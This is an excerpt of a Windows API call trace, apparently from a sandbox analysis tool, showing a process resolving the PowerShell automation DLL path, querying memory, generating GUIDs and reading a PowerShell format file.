	[0602.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.993] VirtualQuery (in: lpAddress=0x28b700, lpBuffer=0x28c5c0, dwLength=0x30 | out: lpBuffer=0x28c5c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0602.994] VirtualQuery (in: lpAddress=0x28b790, lpBuffer=0x28c650, dwLength=0x30 | out: lpBuffer=0x28c650*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0602.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.995] VirtualQuery (in: lpAddress=0x28bf10, lpBuffer=0x28cdd0, dwLength=0x30 | out: lpBuffer=0x28cdd0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0602.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.997] VirtualQuery (in: lpAddress=0x28bf10, lpBuffer=0x28cdd0, dwLength=0x30 | out: lpBuffer=0x28cdd0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0602.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.000] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xfa245f96, Data2=0xfc3, Data3=0x4aab, Data4=([0]=0x9f, [1]=0x70, [2]=0x3c, [3]=0x45, [4]=0x42, [5]=0x68, [6]=0x6e, [7]=0xd3))) returned 0x0
	[0604.091] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x8e01d60, Data2=0xe70a, Data3=0x4516, Data4=([0]=0xb3, [1]=0xa0, [2]=0x66, [3]=0x8d, [4]=0x2d, [5]=0x27, [6]=0x30, [7]=0xbb))) returned 0x0
	[0604.092] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x52055722, Data2=0x53bc, Data3=0x44af, Data4=([0]=0x8d, [1]=0x24, [2]=0xae, [3]=0xba, [4]=0x14, [5]=0x57, [6]=0xf4, [7]=0xe4))) returned 0x0
	[0605.234] VirtualQuery (in: lpAddress=0x28c010, lpBuffer=0x28ced0, dwLength=0x30 | out: lpBuffer=0x28ced0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0605.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.236] VirtualQuery (in: lpAddress=0x28c010, lpBuffer=0x28ced0, dwLength=0x30 | out: lpBuffer=0x28ced0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0605.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.238] VirtualQuery (in: lpAddress=0x28b700, lpBuffer=0x28c5c0, dwLength=0x30 | out: lpBuffer=0x28c5c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0605.239] VirtualQuery (in: lpAddress=0x28b790, lpBuffer=0x28c650, dwLength=0x30 | out: lpBuffer=0x28c650*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0605.241] VirtualQuery (in: lpAddress=0x28be70, lpBuffer=0x28cd30, dwLength=0x30 | out: lpBuffer=0x28cd30*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0605.242] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x392b861c, Data2=0x7361, Data3=0x44ec, Data4=([0]=0x9c, [1]=0xa1, [2]=0xfa, [3]=0xc7, [4]=0x41, [5]=0x2, [6]=0xee, [7]=0xfc))) returned 0x0
	[0605.243] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xca5e38ea, Data2=0x7fbf, Data3=0x434d, Data4=([0]=0x8c, [1]=0x5c, [2]=0x34, [3]=0x2, [4]=0xc8, [5]=0x2f, [6]=0x7b, [7]=0x84))) returned 0x0
	[0605.244] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x358bf611, Data2=0x4c70, Data3=0x458b, Data4=([0]=0xbf, [1]=0x17, [2]=0xd5, [3]=0x46, [4]=0xb1, [5]=0x23, [6]=0x1c, [7]=0xe2))) returned 0x0
	[0605.244] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x2e35b63b, Data2=0x5f1a, Data3=0x49cd, Data4=([0]=0x91, [1]=0x29, [2]=0x5a, [3]=0x64, [4]=0x37, [5]=0x8f, [6]=0xce, [7]=0x94))) returned 0x0
	[0605.244] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x9bee4338, Data2=0x7721, Data3=0x46ad, Data4=([0]=0x92, [1]=0x34, [2]=0x4b, [3]=0xe5, [4]=0xfa, [5]=0xd4, [6]=0x6f, [7]=0x81))) returned 0x0
	[0605.244] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x27db4031, Data2=0xd151, Data3=0x4928, Data4=([0]=0x99, [1]=0xf6, [2]=0xcd, [3]=0x7d, [4]=0xba, [5]=0x38, [6]=0xf, [7]=0xd9))) returned 0x0
	[0605.245] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x29dc36dd, Data2=0xf242, Data3=0x4fd5, Data4=([0]=0xb4, [1]=0xa4, [2]=0x9b, [3]=0xcf, [4]=0x20, [5]=0xa, [6]=0x8c, [7]=0xf8))) returned 0x0
	[0605.245] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xd2cd9f8, Data2=0xca32, Data3=0x47a9, Data4=([0]=0x80, [1]=0x53, [2]=0x12, [3]=0x8f, [4]=0x4a, [5]=0x36, [6]=0xfb, [7]=0x48))) returned 0x0
	[0605.245] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x413e31b5, Data2=0xacc7, Data3=0x4505, Data4=([0]=0xa2, [1]=0xea, [2]=0xde, [3]=0xa9, [4]=0xe2, [5]=0xad, [6]=0xd2, [7]=0x23))) returned 0x0
	[0605.246] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe931b1d4, Data2=0xaae8, Data3=0x4492, Data4=([0]=0x93, [1]=0x1d, [2]=0x86, [3]=0x73, [4]=0xb5, [5]=0xde, [6]=0xac, [7]=0x47))) returned 0x0
	[0605.247] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x8adfa060, Data2=0x66ed, Data3=0x49cf, Data4=([0]=0x87, [1]=0x49, [2]=0xf, [3]=0xa7, [4]=0x86, [5]=0x4c, [6]=0x7e, [7]=0xa5))) returned 0x0
	[0605.248] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x38180261, Data2=0x23b2, Data3=0x4b7d, Data4=([0]=0xb8, [1]=0xeb, [2]=0x2f, [3]=0xd9, [4]=0x93, [5]=0x99, [6]=0x9d, [7]=0x89))) returned 0x0
	[0605.248] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x73b20632, Data2=0xa8d5, Data3=0x4d7c, Data4=([0]=0xb3, [1]=0xaa, [2]=0x13, [3]=0x6a, [4]=0xad, [5]=0x44, [6]=0x35, [7]=0x42))) returned 0x0
	[0605.248] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xdbe477a3, Data2=0xd673, Data3=0x4e8c, Data4=([0]=0xaf, [1]=0x97, [2]=0x5e, [3]=0x54, [4]=0x8b, [5]=0xfe, [6]=0xf5, [7]=0xaf))) returned 0x0
	[0605.249] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x64545cfd, Data2=0xf960, Data3=0x42d8, Data4=([0]=0xab, [1]=0x68, [2]=0xd6, [3]=0x90, [4]=0x14, [5]=0xa1, [6]=0x2c, [7]=0x2d))) returned 0x0
	[0605.249] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xc976f01a, Data2=0xd714, Data3=0x41d7, Data4=([0]=0x8f, [1]=0x1b, [2]=0xa1, [3]=0x0, [4]=0x80, [5]=0x96, [6]=0xad, [7]=0x97))) returned 0x0
	[0605.249] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x1e538f07, Data2=0x9180, Data3=0x4eba, Data4=([0]=0x9c, [1]=0x92, [2]=0x9e, [3]=0x50, [4]=0x18, [5]=0xd9, [6]=0xa8, [7]=0xc6))) returned 0x0
	[0605.249] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xbd15cc40, Data2=0xffd9, Data3=0x4f37, Data4=([0]=0x9f, [1]=0x2e, [2]=0xf2, [3]=0xb6, [4]=0x3, [5]=0xc0, [6]=0xeb, [7]=0x1))) returned 0x0
	[0605.250] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x8b244825, Data2=0xb02c, Data3=0x4ccd, Data4=([0]=0x86, [1]=0x42, [2]=0xb0, [3]=0xf, [4]=0x5, [5]=0x42, [6]=0xfe, [7]=0xfe))) returned 0x0
	[0605.250] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0605.250] GetFileType (hFile=0x310) returned 0x1
	[0605.250] SetErrorMode (uMode=0x1) returned 0x1
	[0605.250] GetFileType (hFile=0x310) returned 0x1
	[0605.250] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.250] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.251] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.251] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.251] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.251] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.251] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.252] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.252] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.254] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.254] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.255] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.255] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
